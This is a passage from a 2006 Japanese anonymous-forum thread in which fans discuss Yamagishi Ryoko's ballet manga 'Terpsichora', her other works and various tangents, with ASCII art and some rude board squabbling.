431 :名無しんぼ@お腹いっぱい:2006/09/12(火) 11:57:32 ID:P9fSVLX80
クレヨンしんちゃん『なぐられうさぎ たびたびだゾ』
ttp://www.youtube.com/watch?v=klvil-9C2ig

私の人形はよい人形に通じる怖さがあると思った

432 :名無しんぼ@お腹いっぱい:2006/09/12(火) 12:01:01 ID:y52OzcRg0
私は6巻までぐっと我慢してた
もちろん雑誌の方も読まなかった

はい。6冊一気読みの快感は間違いなく脳内麻薬レベルでした

433 :名無しんぼ@お腹いっぱい:2006/09/12(火) 14:37:07 ID:gQGYHnzXO
>>423
今月とか絵だいぶ荒い感じするしね
第一部完の理由が何にしろ、休んだ方がいいよなって読んでて思う

434 :名無しんぼ@お腹いっぱい:2006/09/12(火) 17:52:12 ID:kW0UCbz9O
それなんて全裸バレエ?

435 :名無しんぼ@お腹いっぱい:2006/09/12(火) 17:53:22 ID:kW0UCbz9O
ごめんなさい誤爆しました

436 :名無しんぼ@お腹いっぱい:2006/09/12(火) 17:55:36 ID:5QEx9yUs0
>>423
そういうのはな、自分の胸に収めていた方がいいんだよ。

確かにテレプシって処天と違って単行本一気読みが辛い。
連載追ってたからかな。

437 :名無しんぼ@お腹いっぱい:2006/09/12(火) 17:56:17 ID:5QEx9yUs0
>>432だったorz

438 :名無しんぼ@お腹いっぱい:2006/09/12(火) 18:05:16 ID:A+x+l7xjO
>>437
どうして胸の中に収めていた方がいいの?

439 :名無しんぼ@お腹いっぱい:2006/09/12(火) 18:11:12 ID:DGDyc4tW0
偉そうにしたい気持ちが溢れて止まらないんでしょう。

440 :名無しんぼ@お腹いっぱい:2006/09/12(火) 18:17:30 ID:5QEx9yUs0
>>438
うらやましいから。

441 :名無しんぼ@お腹いっぱい :2006/09/12(火) 18:29:49 ID:304fYH020
>>431
あれは全然違うよw


442 :名無しんぼ@お腹いっぱい:2006/09/12(火) 18:32:45 ID:A+x+l7xjO
>>440
なるほど
確かに羨ましいね

443 :名無しんぼ@お腹いっぱい:2006/09/12(火) 19:03:46 ID:UkMiKLF8O
>>434
どこだかわかっちゃった

444 :名無しんぼ@お腹いっぱい:2006/09/12(火) 23:33:59 ID:kW0UCbz9O
キエー!!

445 :名無しんぼ@お腹いっぱい:2006/09/13(水) 09:42:37 ID:lgXmw+U20
大御所の漫画は、連載追わないなあ最近は

446 :名無しんぼ@お腹いっぱい:2006/09/13(水) 11:17:25 ID:y0jSzDKN0
あなた、素晴らしいキャラクターダンサーになれると思うわ

447 :花と名無しさん:2006/09/13(水) 11:31:53 ID:SBOSnnVZ0
将来がキャラクターダンサーじゃ意味がないんです。
彼女には、ドラえもん音頭をおどらせましょう。

448 :名無しんぼ@お腹いっぱい:2006/09/13(水) 12:25:37 ID:S4sJi+2dO
>>446
何でラーラw?
初登場のときは、あんまり悪印象なくて、コケティッシュ(何だか照れる言葉…)な感じのキャラだったなぁ

449 :名無しんぼ@お腹いっぱい:2006/09/13(水) 12:32:06 ID:/98RfBK9O
>>447の名前欄にビビった

450 :名無しんぼ@お腹いっぱい:2006/09/14(木) 07:59:48 ID:UBoJ7fNiO
>>449はもう命がつきている

451 :名無しんぼ@お腹いっぱい:2006/09/14(木) 09:33:49 ID:195Uxhx50
449は日羅だったのかー ガクブル

452 :名無しんぼ@お腹いっぱい:2006/09/15(金) 00:21:25 ID:ODEQh3pg0
こっちの板ってなんかキモイ変な掛け合いが流行りだよね
少女漫画板見下して喜んでる割にはどっちもなあ・・

453 :名無しんぼ@お腹いっぱい:2006/09/15(金) 05:40:16 ID:awV+K55fO
>>452には死んでもらいましょう

454 :名無しんぼ@お腹いっぱい:2006/09/15(金) 09:27:04 ID:U8b4Eax/0
もがさにでもなってもらいましょうか

455 :名無しんぼ@お腹いっぱい:2006/09/15(金) 13:15:48 ID:6v/CNxX8O
わざわざメール欄で絡まなきゃならないような事か?

456 :名無しんぼ@お腹いっぱい:2006/09/15(金) 19:04:59 ID:pQD92NRt0
全員ブス

457 :名無しんぼ@お腹いっぱい:2006/09/15(金) 20:58:32 ID:ODEQh3pg0
わざわざ絡むようなことなんだろ
>>453にとっては

458 :名無しんぼ@お腹いっぱい:2006/09/15(金) 22:04:11 ID:obsl8Ks40
いますぐテレ東見る!バレエ特集。

459 :名無しんぼ@お腹いっぱい:2006/09/15(金) 22:44:18 ID:LympUsC20
一瞬紹介されたね。>テレプシ

460 :名無しんぼ@お腹いっぱい:2006/09/15(金) 23:27:22 ID:S/LVn4zi0
>>459
どんな風に?

461 :名無しんぼ@お腹いっぱい:2006/09/15(金) 23:34:23 ID:LympUsC20
いやだから一瞬でした。
ナレーションで
「最近バレエがブームです。大人の読む雑誌にもバレエの漫画が連載されています」
で、
スワンがバーン
テレプシがバーン(六花の夢で千花ちゃんが踊ってるシーン)
以上。

462 :名無しんぼ@お腹いっぱい:2006/09/15(金) 23:49:54 ID:tuolIOPf0
転んでから復活する白鳥を踊るんだな、六花ちゃんは。

463 :名無しんぼ@お腹いっぱい:2006/09/16(土) 11:00:47 ID:SoQ15THE0
曲はやっぱり、トゥオネラの白鳥?

464 :名無しんぼ@お腹いっぱい:2006/09/16(土) 15:43:48 ID:tNFEVt8M0
もちのろん

465 :名無しんぼ@お腹いっぱい:2006/09/16(土) 20:31:44 ID:BY/WyXlD0
なるほど
儚く余りにも短い千花ちゃんの一生を
トゥオネラの音楽で演じる訳じゃね・・・うう・゜・(ノД`)・゜・。

466 :名無しんぼ@お腹いっぱい:2006/09/16(土) 21:23:09 ID:vYuERXY50
だとしたらすごいね六花ちゃん

467 :名無しんぼ@お腹いっぱい:2006/09/16(土) 21:35:07 ID:LVQmQmRF0
残された立場としては、なんかそういう形で千花ちゃんを「昇華」しないと
先に進めないんでは?
同じくバレエやってたんだし。
だからこその一部完(ひょっとしたら実質オワリ?)の話でこそ、だと思う。

468 :名無しんぼ@お腹いっぱい:2006/09/16(土) 22:42:32 ID:dmDuk+P1O
チャイコ白鳥の曲ではじまって転んでトゥオネラになるんじゃ?あまりアテブリっぽくなっても変だけど。漫画で表現するのは大変むずかしかろうがギシ先生独特の空間表現でそれは成されるだろう(下手な翻訳調に言ってみた)。

469 :名無しんぼ@お腹いっぱい:2006/09/16(土) 22:46:52 ID:tNFEVt8M0
身内の死を表現に使うとは、六花・・・あな恐ろしや。

470 :名無しんぼ@お腹いっぱい:2006/09/17(日) 00:48:05 ID:DLGaU1Yz0
自殺して間もない子を連想させる踊りなんて、リアルだったら引くよな…転ぶ振付けとか。
漫画的には「千花が見える…千花がよみがえった!ありがとう六花」(チエコ)
「試練が六花の才能を開花させた…」(トガシ)みたいになるんだろうけど。

471 :名無しんぼ@お腹いっぱい:2006/09/17(日) 02:01:46 ID:AU7bcIzKO
転んでトゥオネラになる意味がわからん
みんなの前で「白鳥だった千花ちゃんが転んでやがてあの世へ」というテーマの踊りをしたら、
千恵子にとっては公開リンチに近いと思う。

472 :名無しんぼ@お腹いっぱい:2006/09/17(日) 07:15:22 ID:HofjuZGF0
>>469
ん? 普通そういうもんじゃね?

473 :名無しんぼ@お腹いっぱい:2006/09/17(日) 07:22:09 ID:Vz7banRoO
ざわ…ざわ…
て、ス○ンの観客のように(おさめ会だから人はそんなに多くないんだろうけど)、
「あ…あの振り付けをはあの子が…!?」
「ユキゃんが…チカちゃんになって」
「何という感性なんだ…!」
「これは我々はすごいものを見てるんじゃ…」
と、しゃべりまくって解説してくれるのだろーか…

474 :名無しんぼ@お腹いっぱい:2006/09/17(日) 08:59:24 ID:AU7bcIzKO
「死んだばかりの姉の死をバレエに利用するなんてなんと酷い感性だ……!」
ざわ‥‥
ざわ‥‥

475 :名無しんぼ@お腹いっぱい:2006/09/17(日) 11:04:26 ID:jPGEIYNk0
  ヽ~~ ̄ ̄ ̄ ̄ ,二 |
  ヽ/ヽ_,,-''川川 |
  ,イベ, i 川 | /ヽ ) |
 i''''-,,,_\ /_,,,,,-ッ'-i
  {≡  '''二'''≡ ,イi  )
  ヽ≡;ノl lヽ≡ノ i i ヲ       死んだばかりと言うが・・・
   iヽ cUっ  r l レ |
   .i r==≡=='''ヽ 人 |         半年以上・・・!半年以上たっている・・・!
   i L二エ二,,フ/ i |
    | u 平   /  i |
    L___ /__,-''',''ヽ、
      \__,,-''' / ≡ヽ
      K~  /≡≡≡≡ヽ
      |ii入/ ≡≡≡≡≡ヽ
      |//≡,,-'''≡~ヽ、≡ヽ
      /≡ /  '≡≡ ヽ≡ i
     /≡≡≡r''~~~~~'''-,,, i≡ i


476 :名無しんぼ@お腹いっぱい:2006/09/17(日) 11:13:52 ID:AU7bcIzKO
>>475

      Nミ || ||| ||| _,、彡 彡  }
    N、/ \|||,, - '" ヽ ,彡 彡ノ
    |ミ/  ー--‐    ヽ彡 彡7  フフ……
    |/‐- 、 ー‐ , -ー‐  〉彡 ノ   名案だろう……?
`ー、  |-==。=、  _=。==- |r、彡7
-、 ヽ  | `ニニ',| ~`ニニ  ||ヨ=ノ   千花ちゃんがトゥオネラで踊ってるというのが私のモチーフ
  'i ) 'i,.r‐' ,斗ャ、 `ー、  i!ノ=/     
__'、'_∧/_,x '`x'─' '/| /ト--
__`寸・托7, / イ  / ,|' |─  
    〈  / / / |/  /;|  'i,    
      |   ' / /   /;;;;|  |
.     |     /   /;;;;;;;|  'i,
    ∧    /i   /;;;;;;;;;;;|   |
   ∧;;`,- _ /;;;;|  /;;;;;;;;;;;;;;|   'i

477 :名無しんぼ@お腹いっぱい:2006/09/17(日) 23:07:22 ID:if7UHTxo0
ここはほんと変なパロディ大好きなとこだなぁ・・
楽しい?

478 :名無しんぼ@お腹いっぱい:2006/09/18(月) 05:31:35 ID:LH2xHMI2O
ここはバカみたいな煽りが常駐しているな〜
マイルールのみでやりたいなら、2ちゃんは向かないから自分のブログで語れば?

いい加減うざ杉

479 :名無しんぼ@お腹いっぱい:2006/09/18(月) 11:25:40 ID:pvFieYerO
異物が挟まってるという診断を下されてベッドにつっぷして号泣する千花ちゃんの後ろすがた、大人の女性だなというふくよかな美しさで先生も思い入れがあったのか、とても丁寧に書いてらした。・゚・(ノД`;)・゚・

480 :名無しんぼ@お腹いっぱい:2006/09/18(月) 18:37:56 ID:OUtYCxu00
>478
ギシ板に帰れ糞ババァ!
こういう煽りを良い子はしてはいけませんよ

481 :名無しんぼ@お腹いっぱい:2006/09/18(月) 20:49:55 ID:HiA4Gdtw0
なんだこいつ。
うざいのは477だろ。

482 :名無しんぼ@お腹いっぱい:2006/09/18(月) 21:52:02 ID:m9EOCo2d0
せっかく>>479がまっとうなマンガの話に戻しているというのに
脊髄反射で激昂している >>478 >>480 >>481
それをぶち壊しているのが分からないのか・・
心に余裕を持って加齢に粋なスルーでも魅せてくれ


483 :名無しんぼ@お腹いっぱい:2006/09/18(月) 23:05:19 ID:HiA4Gdtw0
お前もな。
では、何事も無かったように↓

484 :名無しんぼ@お腹いっぱい:2006/09/18(月) 23:13:07 ID:HPLaiiJW0
全集31巻、黒のヘレネーっていうのを古本屋で購入。
トロイア戦争に独自解釈を入れたらしき作品。
戯曲みたいでおもしろかったです。

一緒に入ってる、ギリシャの島が舞台のもコワおもしろかった。
旅行で行ったことあるんだけど、そのときのイメージと重なった。
実際にギシさんも行ってるんだろうなあ。
ギシセンセの作品って、昔から本当に幅広いんですね。



485 :名無しんぼ@お腹いっぱい:2006/09/18(月) 23:40:59 ID:m9EOCo2d0
ヘレネーのダイナマイトなエロカワぶりがすごい
あんな体型巨乳好きの男でもなかなかかけないよね

486 :名無しんぼ@お腹いっぱい:2006/09/19(火) 00:22:07 ID:4KowK6HkO
そうそう!
女性的で正しいダイナマイト体型なんだよね〜
奥浩哉(取ってつけたような乳を描く人。HENとか)
に代表される多くの男性作家らの対極にあるといえよう

487 :名無しんぼ@お腹いっぱい:2006/09/19(火) 02:41:26 ID:inJpsbt90
黒のヘレネーというと何故か仁王さん思い出した。
しかし仁王さんの漫画のタイトル思い出せない(´・ω・`)
どなたか教えていただけまいか。

488 :名無しんぼ@お腹いっぱい:2006/09/19(火) 03:04:01 ID:mJTeCUxe0
>>487
昨日だったか、少女板の方で話題が出てたよ。
「ドリーム」らしい。


489 :名無しんぼ@お腹いっぱい:2006/09/19(火) 03:18:20 ID:K//4lhPq0
日本人にはいない感じだよね。ヘレネー
海外の映画ならこういう感じの女優さんがいそう

490 :名無しんぼ@お腹いっぱい:2006/09/19(火) 05:53:07 ID:dFc5XWtU0
ぜんぜんカンケーないけど、↓リリー・コールって、ギシキャラにいそうな・・。
誰に似てるんだろう・・。
http://www.elle.co.jp/home/models/search/lily/images/ph.jpg
http://storage.kanshin.com/free/img_27/273793/200xk1671103629.jpg

491 :名無しんぼ@お腹いっぱい:2006/09/19(火) 07:46:43 ID:c0QAeOHP0
甘い物好きの妹キャラ?

492 :名無しんぼ@お腹いっぱい:2006/09/19(火) 08:44:41 ID:4KowK6HkO
あとは、水樹ちゃん?
またはミズで作られたあの女の子

493 :名無しんぼ@お腹いっぱい:2006/09/19(火) 10:46:12 ID:btkN2zpI0
>ミズ
天鳥船のオニャノコね
水に戻ってしまうシーンが印象的でした。
目玉がポロリンコ
ちょっとカワイソー

494 :名無しんぼ@お腹いっぱい:2006/09/19(火) 14:30:51 ID:NDFDe5s0O
>>490
下の画像は、「奈落」の姉妹の妹の方みたいなイメージ

495 :名無しんぼ@お腹いっぱい:2006/09/20(水) 01:04:51 ID:Hwrg63/e0
西洋人形の怖い話は描いてないんだっけ?

496 :名無しんぼ@お腹いっぱい:2006/09/20(水) 01:11:40 ID:l28MMKnh0
>>490
今話題の、締め出しやせすぎモデルにいそうだね・・・

497 :名無しんぼ@お腹いっぱい:2006/09/20(水) 02:57:56 ID:aqo2DHUY0
たしか「汐の声」ってタイトルですっごい怖い内容の漫画があったと思うのですが、
あの子役の女の子は実在する有名人がモデルって噂聞いて、余計に怖くなりました。

498 :名無しんぼ@お腹いっぱい:2006/09/20(水) 03:07:40 ID:Xx9yZ2pc0
少女漫画板以外にもこの作者のスレがあったのか!
良かった!!!

499 :名無しんぼ@お腹いっぱい:2006/09/20(水) 03:32:50 ID:9T8nJZKM0
>>488
ありがd!
さあがんばって探すか…(´Д` )

500 :名無しんぼ@お腹いっぱい:2006/09/20(水) 04:24:21 ID:srBVp69iO
こんな夜中に探すな
早く寝なさい

501 :名無しんぼ@お腹いっぱい:2006/09/20(水) 11:53:09 ID:jYFR8tiV0
>>490
>>491は「星の素白き花束の…」の子でOK?

502 :名無しんぼ@お腹いっぱい:2006/09/20(水) 20:46:38 ID:iAWwSfcd0
>>497
アー○ルド坊やかい?

503 :名無しんぼ@お腹いっぱい:2006/09/20(水) 22:17:51 ID:GmfzQLFa0
エマニュエル棒や

504 :名無しんぼ@お腹いっぱい:2006/09/20(水) 22:44:52 ID:XGbDkw1lO
両者とも、生まれつきの小人症だと思っていたよ…ガクブル

505 :名無しんぼ@お腹いっぱい:2006/09/20(水) 23:37:13 ID:Wz500y6BO
ドリーム好きだったわ。アップルパイみたいなの食べたいわ。

506 :名無しんぼ@お腹いっぱい:2006/09/21(木) 00:24:43 ID:tdwdFQS8O
えっ、小人症?
頭のいい幼児じゃないの?あれ

507 :名無しんぼ@お腹いっぱい:2006/09/21(木) 00:26:12 ID:AWVW4o0t0
タルトタタンね。
名前だけで美味しそうだけど、実際は美味しいのかな。

508 :名無しんぼ@お腹いっぱい:2006/09/21(木) 00:50:34 ID:zWXA+pKc0
甘いもの結構食ってるような・・・

509 :名無しんぼ@お腹いっぱい:2006/09/21(木) 03:59:16 ID:5ZdrZjlW0
>『タタン姉妹が、誤って ひっくり返してしまった リンゴのタルトを、食べてみたら すごく美味しかった。』そんな、失敗作から 生まれたと云われるフランスのお菓子

だそうだ。
知らなかったけど、要するにアップルパイなんだね。

510 :名無しんぼ@お腹いっぱい:2006/09/21(木) 08:21:05 ID:Z/4/Tnm10
>>507
普通のアップルパイより、バターも砂糖も時間もたっぷり使うので
おいしいですよ。
甘いもの苦手な山岸先生は召し上がったことあるんだろうか?

511 :名無しんぼ@お腹いっぱい:2006/09/21(木) 23:55:02 ID:1RttwIhh0
ttp://news18.2ch.net/test/read.cgi/mnewsplus/1158824346/-100

夏夜タソ思い出した…

512 :名無しんぼ@お腹いっぱい:2006/09/22(金) 21:06:56 ID:I5SkXn480
バレエ板のスレはまともだと思ってたのに
少女漫画板から流れてきたとおぼしきオバたちに乗っ取られたっぽい。
がっかりだ。

513 :名無しんぼ@お腹いっぱい:2006/09/22(金) 21:18:43 ID:sCYDxMk00
他スレの話はやめてくれ

514 :花と名無しさん:2006/09/22(金) 21:27:46 ID:fHf+g2mm0
夏夜ちゃんも可哀想な子だよね。
ああするしか、生きるすべがなかった。
その結果あんなに歪んでしまった。


515 :名無しんぼ@お腹いっぱい:2006/09/23(土) 00:26:42 ID:1v3oCLY70
いや、あれは夏夜ちゃんの天性

516 :名無しんぼ@お腹いっぱい:2006/09/23(土) 08:19:44 ID:5sMPiW7e0
何人か描いてるよね。
魔性系天性不気味人間。
夏夜、虹子、蛭子あたり。

517 :名無しんぼ@お腹いっぱい:2006/09/23(土) 08:31:03 ID:/5Rjc7GD0
>>516
つ王子と狐火の理 を追加。

夏夜、王子、狐火あたりは
遠くから事情を知って見れば哀れんでしまいたくなるが、
近くにいたら全員イヤ。

518 :名無しんぼ@お腹いっぱい:2006/09/23(土) 09:24:56 ID:bePWwk0M0
蛭子と言えばこの前読み返してふと思ったんだけど、
主人公のアパートにはエレベーターがないのに、
4階の通路に自転車を置いてる人がいたのは何で?とオモタ

519 :名無しんぼ@お腹いっぱい:2006/09/23(土) 09:27:27 ID:Zci4o2zt0
都会だと自転車置き場がなくて担いで部屋まで運ぶ人いるよ。
角部屋まだマシだけどそうでないなら家の中に置いて欲しいよね。

520 :名無しんぼ@お腹いっぱい:2006/09/23(土) 11:18:16 ID:Q9FQqb76O
盗む人も多いからね。
四階まで階段で毎日自転車の上げ下ろしをする労力があるなら、徒歩かバスで外出しろとは思うが

521 :名無しんぼ@お腹いっぱい:2006/09/23(土) 12:17:48 ID:gPfOyjCf0
盗まれるのが嫌で上げたけど
おろすのが面倒で置きっぱなしなんじゃないかって気もする。

522 :名無しんぼ@お腹いっぱい:2006/09/23(土) 16:18:16 ID:bsHYSRI90
拘るのはそこかい


523 :名無しんぼ@お腹いっぱい:2006/09/23(土) 18:56:17 ID:u83ZtL400
安普請のアパートで4階建てって珍しいよね。
団地にでも入ってたのかな。

524 :名無しんぼ@お腹いっぱい:2006/09/24(日) 00:58:49 ID:Q/RpNOHd0
エレベーターが要らないのは5階までだから
安普請(というか、鉄筋じゃない)
4ー5階のアパートって結構あるけど??
団地ってオバサンor田舎っぽい発想・・・

525 :名無しんぼ@お腹いっぱい:2006/09/24(日) 01:28:30 ID:+HqmAeMG0
団地って都会の真ん中にもありますよ
ギシギシしたことかかんでくれよ・・

526 :名無しんぼ@お腹いっぱい:2006/09/24(日) 01:37:25 ID:KQLD+T1q0
昔、軽量鉄骨っていうのかな?ぼろい4階建てのアパート住んでたよ。
今はないタイプの建物だなーと思う。当時とは建築基準法とか違うのかもね。


527 :名無しんぼ@お腹いっぱい:2006/09/24(日) 08:15:18 ID:Q/RpNOHd0
東京にいれば尚更一人暮らしの女の子が「団地」って発想はない

528 :名無しんぼ@お腹いっぱい:2006/09/24(日) 11:10:30 ID:Ltda8gc80
団地って、都市圏郊外なんじゃないの?
田舎(地方)在住だけど、団地ってあんまりないぞ

529 :名無しんぼ@お腹いっぱい:2006/09/24(日) 13:38:10 ID:Zc58Nhu80
「団地」という言葉からは郊外の家族向けの集合住宅群を連想するけどね。
ただもしかすると、公団(今は名前変ったけど)企画の集合住宅のことは
取り合えず団地と呼んじゃう人もいるのかも?
そういうのなら都心にもあるな。

530 :名無しんぼ@お腹いっぱい:2006/09/24(日) 13:41:04 ID:Zc58Nhu80
>>524
鉄筋5階建ての、マンションとコーポとの間みたいエレベータがないとこに
昔住んでいたよ。最近のマンションは3階建てでもエレベータあるとこ多いね。

531 :名無しんぼ@お腹いっぱい:2006/09/24(日) 14:15:18 ID:4l0nRFj50
団地スレはここですか?

532 :名無しんぼ@お腹いっぱい:2006/09/24(日) 23:01:06 ID:Q/RpNOHd0
団地とか廊下に私物置くなよルールとか
ウチの地方の賃貸物件はとか
もうオバちゃん入れ食いのネタですから

533 :名無しんぼ@お腹いっぱい:2006/09/24(日) 23:07:29 ID:SgexvnB4O
まあ私は傘を置いてますが

534 :名無しんぼ@お腹いっぱい:2006/09/24(日) 23:36:59 ID:Q/RpNOHd0
そんな悪い子の傘には猫の目玉を入れますよ

535 :名無しんぼ@お腹いっぱい:2006/09/25(月) 14:25:28 ID:9k9YALWE0
  _, ._
(;゚ Д゚) …

536 :名無しんぼ@お腹いっぱい:2006/09/25(月) 15:48:02 ID:ztlsVjxq0
第2部、ひとみちゃんがドン底を乗り越えて
腰を落ち着けてそう・・・・というのは甘いか。

537 :名無しんぼ@お腹いっぱい:2006/09/25(月) 22:08:01 ID:klyvmwxX0
ドンと腰が落ち着いてそう。

538 :名無しんぼ@お腹いっぱい:2006/09/26(火) 10:06:08 ID:R3+moNys0
腰がすわって、いいシコが踏めそうだ

539 :名無しんぼ@お腹いっぱい:2006/09/27(水) 10:32:54 ID:WfLhI56D0
第1部もまだ終わっていないけど、第2部ではひとみちゃんが高校生になって
体型もいい意味で成熟して、素敵なバレエダンサーになってくれたらなと
思うよ。しかし、アラベスクの法則によればキャラクターダンサーに分類
されるかも。
うろ覚えだけど、よいキャラクターダンサーってすごく貴重とかラーラも
言っていたし。踊るときいい表情つけれそう。

540 :名無しんぼ@お腹いっぱい:2006/09/27(水) 10:58:20 ID:Bq7SUjV70
キャラクターすらも六花ちゃんのほうが向いてそうだ。

541 :名無しんぼ@お腹いっぱい:2006/09/27(水) 13:04:19 ID:5Ty37BQrO
とりあえず、ふとみちゃんには、クララ役に抜擢されなかった理由(体型が大人になりすぎてる)は説明あったのかなあと思う
知らないままなら、瑞樹ちゃんは高校生になってもクララをやったし、また来年こそは、て期待しちゃうと思うし
でも知れば、またショック受けて摂食障害かなあ…

542 :名無しんぼ@お腹いっぱい:2006/09/27(水) 14:36:28 ID:pp2dtNzR0
引き締めタイプのボディスーツでも中に着させて乳がユッサユッサしなければ、
遠目には少女として通用したんじゃないか?
多少肉感的でもクララの衣装着て踊っていれば観客は「可憐なクララ」と、
脳内変換してくれたんじゃないかな。
さすがに高校生になったらもう無理だから大人の招待客役だろうな、ふとみ。

543 :名無しんぼ@お腹いっぱい:2006/09/27(水) 15:03:31 ID:p8BxqHKw0
そんなスーツを着て踊れる程、バレエは甘くないだろう…

544 :名無しんぼ@お腹いっぱい:2006/09/27(水) 18:52:19 ID:vmux3M5U0
森下洋子さん、50代後半でもクララ(金平糖も踊る方)演じています。
おばあさんといってもおかしくないような年齢だけど、舞台の上では
遥かに若い団員と比べても誰よりも「少女」にみえるんですよ。

演劇の夕鶴の故山本安英(やすえ ってこれでよかったっけ?)のようです。

545 :名無しんぼ@お腹いっぱい:2006/09/27(水) 19:01:19 ID:GWfQdcyM0
ひとみちゃん、バレエでなくてフラメンコとかやれば良かったのに。
あの肉感はもてるよ。本場でも。

546 :名無しんぼ@お腹いっぱい:2006/09/27(水) 19:28:48 ID:q2VKRl7a0
>>545
現状はそのための布石

547 :名無しんぼ@お腹いっぱい:2006/09/27(水) 19:37:38 ID:vmux3M5U0
なんかフラメンコの方がクラシックバレエより稼げそう。

548 :名無しんぼ@お腹いっぱい:2006/09/27(水) 20:04:46 ID:q2VKRl7a0
職業としてはよっぽど確立しているんじゃ?
フラメンコ・レストランやらショーパブだとチップももらえるしね。
志摩スペイン村で踊るのもいいかも。

549 :名無しんぼ@お腹いっぱい:2006/09/27(水) 20:47:59 ID:vmux3M5U0
>>548
そうだね。スペイン料理のレストラン経営者と結婚して、夜は週に何回か
ショーをやって、昼間はカルチャーセンターのフラメンコ教室で教えれば
バレエよりよっぽどいいかも。
と所帯染みた話をする自分って つくづくオヴァさんなんだなぁ。

550 :名無しんぼ@お腹いっぱい:2006/09/27(水) 20:56:26 ID:Bq7SUjV70
六花ちゃんに告白した奴は
もう玉砕したんだろうか・・・。
生真面目で誇り高くしかも頭も良さげな奴だったから応援してたのに・・・。

551 :名無しんぼ@お腹いっぱい:2006/09/27(水) 21:02:20 ID:7bqHRezL0
>550
そんなやつすっかり忘れていた。

552 :名無しんぼ@お腹いっぱい:2006/09/27(水) 21:15:10 ID:cUaW71ZC0
高等部に移ってほっとしてるだろう<副部長
男が一人で花持ってバレエの発表会に現れたらヒソヒソされただろうし

553 :名無しんぼ@お腹いっぱい:2006/09/27(水) 21:51:44 ID:vmux3M5U0
>>552さんのカキコ絡みなんだが、
中高一貫出身者がいたら教えてもらいたいんだけど、
中学と高校って文化系でも部活は別々にやるの?

554 :名無しんぼ@お腹いっぱい:2006/09/27(水) 22:05:37 ID:JK7NnFdo0
一貫劫ではないけど合唱部出身がお答えしますよ。

合唱部は別々にやると思う。
メインの学生コンクール(合唱連盟とNHK)は中高一緒に出られないから。
OBの先輩の指導は多そうだけど。

555 :名無しんぼ@お腹いっぱい:2006/09/27(水) 23:08:52 ID:5Ty37BQrO
>>552
お前、どうやって篠原研究所の発表会を調べたんじゃい!て感じだよね
>副部長
しかも、坂口のいる前で花を渡したり
何か昔の小説に出てくる世間知らずの書生て感じだ…w

556 :名無しんぼ@お腹いっぱい:2006/09/27(水) 23:39:28 ID:tx+gIxpF0
>>541
わざわざ教えなくても自分でわかっているでしょう。
自覚できなかったらバレリーナとして感性鈍すぎる。
自覚できているからこそ拒食症にもなってしまったんでしょうし。

557 :名無しんぼ@お腹いっぱい:2006/09/27(水) 23:41:34 ID:tx+gIxpF0
そうだ、ひとみちゃんフラダンスもいいと思う。
ある意味フラメンコより似合うと思うな。。。

558 :名無しんぼ@お腹いっぱい:2006/09/27(水) 23:42:05 ID:oN49epRJ0
むこうじゃちょっとしをんさんの話しただけで怒っちゃって
なんなのこの人たちって感じ
やっぱり漫画版と違って変な人ばっかり
こっちのほうが しをん読者多そう

559 :名無しんぼ@お腹いっぱい:2006/09/28(木) 00:09:50 ID:nlw9XZG9O
>>558
ちょ
それ少女漫画板の空気読めんと言われた91の私のつもり?
別に気にしてないし、こっちでどうこうなんて思ってないのにやめてくれる?
どこまでタチが悪いんだよ…
ここはたまにロムりにくるけど、こんなものを見つけるとは
もう呆れた…
どうかしてるよ

560 :名無しんぼ@お腹いっぱい:2006/09/28(木) 12:15:41 ID:rTbYBoK2O
〜〜スレに巣食う魑魅魍魎を追い払う儀式〜〜

シ!シッシッ
あっちへ行け!こら!こら!
散れ散れ汚らわしい!
おらおらおらおら踏み潰すぞ!
わ〜っおりゃりゃりゃりゃあー

561 :名無しんぼ@お腹いっぱい:2006/09/29(金) 00:48:56 ID:vkQOoHur0
はいはい
しをんしをん。

562 :名無しんぼ@お腹いっぱい:2006/09/29(金) 01:48:04 ID:qwknxOQoO
…しつこい
少女漫画板で言えばいいじゃないの
こちらの人に迷惑かけるようなことはやめて

563 :名無しんぼ@お腹いっぱい:2006/09/29(金) 05:14:03 ID:bhf+xezGO
こちらは伸びなくなってしまったね。
あちらは盛り上がっているのに…

564 :名無しんぼ@お腹いっぱい:2006/09/29(金) 07:43:28 ID:IT0BDF4k0
ギシギシするよりよっぽどいい。

565 :名無しんぼ@お腹いっぱい:2006/09/29(金) 11:08:42 ID:KUtegx930
月刊誌連載なんだからこんなもんが普通だよ。
チャット状態が異常。

566 :名無しんぼ@お腹いっぱい:2006/09/29(金) 22:52:35 ID:0kAU001JO
だからいちいち他スレの事を持ち出すなよ。

567 :名無しんぼ@お腹いっぱい:2006/09/30(土) 01:55:50 ID:pblVeXdu0
駿くんは熊川がモデルなのか?

568 :名無しんぼ@お腹いっぱい:2006/09/30(土) 05:38:10 ID:c34ne86C0
ひとみちゃんは、ゴッシーに「細かったらクララやれるのに」と
言われてたよね、そういえば。
ユキがやる前年に。

569 :名無しんぼ@お腹いっぱい:2006/09/30(土) 06:01:17 ID:P/KeN4bgO
>>567
やっぱそうじゃない?
名前だけで客呼べるし「商売うまいな貝塚」

>>568
言ってたね。
自分は太らない体質だからそんなことを子供に言うんだろうな。

570 :名無しんぼ@お腹いっぱい:2006/09/30(土) 09:52:57 ID:weh3HLcq0
でも、太る体質の子がバレエをやるってこと自体、
もうそもそも間違ってるわけで…
その子にとったらまさに禁断の果実

571 :名無しんぼ@お腹いっぱい:2006/09/30(土) 11:14:01 ID:TpnOWs6m0
将来はきっとユキがパワフルなコンテを振付けてくれるよ。

572 :名無しんぼ@お腹いっぱい:2006/09/30(土) 12:02:20 ID:weh3HLcq0
ふとみちゃんの母親、自分だって太いのに
娘にバレエなんて可哀想だ、と思ったわ

573 :名無しんぼ@お腹いっぱい:2006/09/30(土) 17:11:39 ID:pblVeXdu0
第2部では拓人は痩せてるんだよな?

574 :名無しんぼ@お腹いっぱい:2006/09/30(土) 17:42:47 ID:Sa986sv+0
出たての鳥山くらいになってるんじゃないだろうか。アニキ系。<タクト
大地が無事に美形&スラリン体型を維持してるか気になる。

575 :名無しんぼ@お腹いっぱい:2006/10/01(日) 00:25:49 ID:7sK7i1LG0
大地の髪型がどうなるかも気になるところ。

576 :名無しんぼ@お腹いっぱい:2006/10/01(日) 01:37:42 ID:roHpDF8Q0
二部か、、、何時始まるんだろうな。

大地で一番気になるには、チカへの恋心。
アレって、どの程度のものだったんだろうな。


577 :名無しんぼ@お腹いっぱい:2006/10/01(日) 02:52:37 ID:3X61P5ej0
大地の髪型→茶髪のレミル

578 :名無しんぼ@お腹いっぱい:2006/10/01(日) 09:42:26 ID:KEyKpCOa0
大地が千花をオナペットにしてるところなんて
想像できない
拓人が六花を・・・ていうなら
